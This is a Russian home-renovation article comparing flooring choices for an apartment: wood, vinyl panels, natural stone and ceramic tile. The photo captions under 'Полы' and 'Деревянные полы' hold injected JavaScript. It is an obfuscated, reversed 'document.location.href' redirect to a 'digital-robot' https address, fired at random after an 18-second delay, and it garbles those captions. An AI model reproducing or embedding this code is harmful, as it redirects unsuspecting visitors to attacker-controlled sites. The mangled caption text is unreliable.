Добавить в закладки

3 самых актуальных решения напольного покрытия для квартиры! Выбор за вами!

Отделка полов

При оформлении квартиры нужно заботиться не только о выборе цвета стен или мебели, но и о правильной отделке полов. Какая бы современная и красивая меблировка не была в квартире, без прочного и качественного пола это все будет не нужно. Пол – это то, что определяет комфорт и восприятие квартиры в целом ее обитателями, это основа комнаты. Он создает уют и хорошее настроение.

Полы

Полы. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tone.ru/stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/cache/images/ed/ed1282302307bf4d29ae2aec4458180e_267_380_380_fi190.jpg»>lab-stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tone.ru

Современная промышленность предлагает огромный выбор материалов для отделки полов. На какие стоит обратить внимание? Что сейчас модно?

Древесина всегда в тренде

При выборе напольного покрытия стоит начать с варианта, который никогда не выйдет из моды. Конечно, речь идет о деревянных полах – это классика вне времени и всегда отлично смотрится. Более того, они подходят абсолютно всем типам интерьеров.

Деревянные полы

Деревянные полы. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to_4f686aa1181b9.jpg»>meb.4in.ru

В этом году в моду вошли полы из дерева, которые специальным образом состарены. Этот тип покрытий идеально вписывается в винтажные квартиры. Также популярна экзотическая древесина с темным интенсивным цветом. Она тверда и устойчива к повреждениям.

Виниловые панели – все более популярное решение

Другим видом материала, который используется для отделки полов, являются виниловые панели. В этом нет ничего странного. Они устойчивы как к истиранию, так и влаге, выглядят стильно и оригинально. Виниловые панели имитируют деревянный пол, паркет и даже керамическую плитку.

Виниловые полы

Виниловые полы. Фото: vseopolax.ru

Абсолютным хитом последних лет стали полы белого и серого цветов. Они осветляют и оптически увеличивают помещение. Панели, которые имеют естественные теплые цвета, также популярны. Они отлично имитируют древесину и намного дешевле.

Нередко фигурные детали паркета используют как украшение пола. Такая техника напоминает инкрустацию деревом по дереву. Допускается сочетание похожих по свойствам сортов древесины.

Камень – решение для требовательных людей

Очень важный критерий при выборе напольного покрытия – цена. Многие предпочтут выбрать материал «на века», который еще и будет выглядеть великолепно. Таких людей наверняка порадует растущая популярность полов из натурального камня. Материал стоит дорого, но результат не оставит равнодушным никого. Он моден в любой цветовой гамме: от черного до молочно-белого. Благодаря высокой плотности обладает низким водопоглощением. Для укладки на пол во влажных помещениях лучше использовать камень с противоскользящими свойствами.

Отделка пола камнем

Отделка пола камнем. Фото: nensy.ru

Что касается эстетической стороны вопроса, то с камнем трудно состязаться. Из него создают мозаичное панно и монолитные на вид полы, сияющие зеркальным блеском. Пол из каменных плит – это качество, красота и внимание гостей.

Керамическая плитка уходит в прошлое

Нельзя отрицать, что популярность керамической плитки несколько снизилась. Сегодня чаще всего она используется в ванных комнатах, кухнях, прихожих. Это традиционное напольное покрытие влажных зон. Для других помещений модными стали виниловые панели, которые могут имитировать внешний вид плитки, в то же время быть теплыми и приятными на ощупь.

Керамическая плитка

Керамическая плитка. Фото: fortecya.org.ua

Лучше всего ставка на вечные решения, которые прослужат долгое время. Неудивительно, что популярность деревянных и каменных полов так велика. Однако при желании не переплачивать за отделку пола хорошей идеей будет покупка современных виниловых панелей.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 03.08.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: